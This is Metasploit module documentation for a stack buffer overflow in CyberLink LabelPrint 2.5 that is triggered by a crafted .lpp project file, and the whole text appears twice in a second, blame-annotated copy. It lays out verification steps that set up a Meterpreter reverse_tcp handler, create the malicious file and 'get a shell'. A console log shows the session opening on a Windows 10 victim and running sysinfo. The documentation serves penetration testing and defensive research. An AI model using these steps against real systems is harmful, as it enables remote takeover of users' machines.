documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md

## Description

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
The vulnerability is triggered when opening a .lpp project file containing overly long string characters
via open file menu. This results in overwriting a structured exception handler record and take over the
application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).

## Vulnerable Application

CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html)

## Verification Steps

1. `./msfconsole`
2. `use exploit/multi/handler`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set lhost <lhost>`
5. `set exitonsession false`
6. `exploit -j`
7. `use windows/fileformat/cyberlink_lpp_bof`
8. `set lhost <lhost>`
9. `set target 2`
10. `exploit`
11. Copy file to Win10 host and open in vulnerable software
12. Get a shell

## Scenarios

### Tested Windows 10 x64 running CyberLink LabelPrint v2.5

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 172.22.222.132:4444
use windows/fileformat/cyberlink_lpp_bof
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
target => 2
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit

[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) >
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
```
Add documentation 2018-12-11 07:55:52 -06:00			`## Description`

			`This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.`
			`The vulnerability is triggered when opening a .lpp project file containing overly long string characters`
			`via open file menu. This results in overwriting a structured exception handler record and take over the`
			`application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).`

			`## Vulnerable Application`

			`CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html)`

			`## Verification Steps`

			1. `./msfconsole`
			2. `use exploit/multi/handler`
			3. `set payload windows/meterpreter/reverse_tcp`
			4. `set lhost <lhost>`
			5. `set exitonsession false`
			6. `exploit -j`
			7. `use windows/fileformat/cyberlink_lpp_bof`
			8. `set lhost <lhost>`
			9. `set target 2`
			10. `exploit`
			`11. Copy file to Win10 host and open in vulnerable software`
			`12. Get a shell`

			`## Scenarios`

			`### Tested Windows 10 x64 running CyberLink LabelPrint v2.5`

			```
			`msf5 > use exploit/multi/handler`
			`msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
			`msf5 exploit(multi/handler) > set lhost 172.22.222.132`
			`lhost => 172.22.222.132`
			`msf5 exploit(multi/handler) > set exitonsession false`
			`exitonsession => false`
			`msf5 exploit(multi/handler) > exploit -j`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`
			`msf5 exploit(multi/handler) >`
			`[*] Started reverse TCP handler on 172.22.222.132:4444`
			`use windows/fileformat/cyberlink_lpp_bof`
			`msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132`
			`lhost => 172.22.222.132`
			`msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2`
			`target => 2`
			`msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit`

			`[*] Creating 'msf.lpp' file ...`
			`[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp`
			`msf5 exploit(windows/fileformat/cyberlink_lpp_bof) >`
			`[*] Sending stage (179779 bytes) to 172.22.222.200`
			`[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600`
			`sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > sysinfo`
			`Computer : DESKTOP-IPOGIJR`
			`OS : Windows 10 (Build 17134).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter > exit`
			`[*] Shutting down Meterpreter...`

			`[*] 172.22.222.200 - Meterpreter session 1 closed. Reason: User exit`
			```